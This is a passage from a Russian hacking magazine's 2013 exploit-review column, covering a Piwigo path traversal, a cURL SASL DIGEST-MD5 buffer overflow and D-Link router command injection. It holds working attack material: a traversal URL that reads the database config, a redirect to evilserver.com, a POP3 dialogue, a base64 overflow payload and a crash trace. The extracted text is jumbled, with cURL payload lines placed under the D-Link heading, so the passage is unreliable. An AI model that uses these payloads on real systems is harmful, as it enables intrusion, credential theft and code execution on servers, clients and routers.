ПРИНТЕРЫ СЕГОДНЯ - Xakep Online

ХАКЕР 04 /171/ 2013 Взлом65Обзор эксплойтов$_GET['dl'];...echo file_get_contents($filename);...}Например, для того, чтобы узнать настройки подключения к БД, обратимсяпо следующему адресу:http://[TARGET_HOST]/install.php?dl=/../../local/config/database.inc.phpНо не забываем, что при этом файл удалится, и сайт перестанет работать.Уязвимость тестировалась на Windows 7, PHP 5.3+.TARGETS. Piwigo 2.4.6 и, возможно, предыдущие версии.SOLUTION. Обновиться до 2.4.7.ПЕРЕПОЛНЕНИЕ БУФЕРА В СURLCVSSv210 (AV:R/AC:L/Au:N/C:C/I:C/A:C)Дата релиза: 6 февраля 2013 годаАвтор:VolemaCVE: 2013-0249В функциях обработки POP3-, SMTP-протоколов была найдена удаленноэксплуатируемая уязвимость, которая может привести к выполнениюпроизвольного кода. Так как исходники программы хранятся на GitHub,то мы без проблем можем посмотреть на патч, исправляющий эту ошибку:bit.ly/ZrvZsN. Видно, что использовались небезопасные функции по работесо строками: strcat и strcpy, без соответствующих проверок. В момент,когда происходит аутентификация SASL DIGEST-MD5, функция Curl_sasl_create_digest_md5_message() использует данные, пришедшие от сервера,не проверив их длину. Далее эти данные добавляются к буферу фиксированногоразмера.EXPLOIT. Эксплуатация возможна при обращении к почтовым серверам,но можно использовать маленькую хитрость и выполнить это через веб. ДелаемHTTP-запрос на наш сервер:GET / HTTP/1.0Host: evilserver.comкоторый вернет редирект на почтовый сервер через location:HTTP/1.0 302 FoundLocation: pop3://x:x@evilserver.com/.CURL обработает редирект и подсоединится к evilserver.com на порт 110,используя POP3-протокол. Ответ сервера при этом должен быть:+OK POP3 server readyОтвет cURL:Возможно, ты заметил что-то знакомое в коде. Это base64 следующегозапроса:realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8Переполнение буфера возникает из-за того, что размер буфера "URI" —128 и размер параметра realm также 128. В GDB наша ошибка выглядит следующимобразом:Program received signal SIGSEGV, Segmentation fault.0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6(gdb) bt#0 0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6#1 0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message ()from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4#2 0x4141414141414141 in ?? ()...#1469 0x4141414141414141 in ?? ()#1470 0x656d616e72657375 in ?? ()Cannot access memory at address 0x7fff63b8b000Исходник сплоита можно найти в блоге автора: bit.ly/ZoOryR.TARGETS. CURL/libcurl версии с 7.26.0 до 7.28.1.SOLUTION. Рекомендуется отключить все протоколы, кроме HTTP(S),в приложениях, использующих CURLOPT_PROTOCOLS и CURLOPT_REDIR_PROTOCOLS, или установить версию 7.29.0 или выше.МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИВ РОУТЕРАХ D-LINK DIR-600 И DIR-300 (REV B)CVSSv2:Дата релиза:Автор:CVE:N/A4 февраля 2013 годаm-1-k-3N/AАвтор эксплойта ждал почти два месяца с момента обнаружения уязвимостии уведомления вендора, но так и не получил ответа. Поэтому решено быловыложить все наработки в паблик.EXPLOIT. Уязвимость существует из-за отсутствия как ограничения, так и проверкивходящего параметра cmd, что позволяет выполнить любой код неавторизованномупользователю. Можно даже не использовать эксплойт 1337day.com/exploit/20327, а просто запустить из командной строки в любом Linux:CAPAСервер отвечает с помощью механизма DIGEST-MD5:+OK List of capabilities followsSASL DIGEST-MD5IMPLEMENTATION dumbydumb POP3 serverПоэтому libcurl отвечает соответственно:AUTH DIGEST-MD5И теперь высылаем полезную нагрузку:+ cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=Получение шелла на роутере D-Link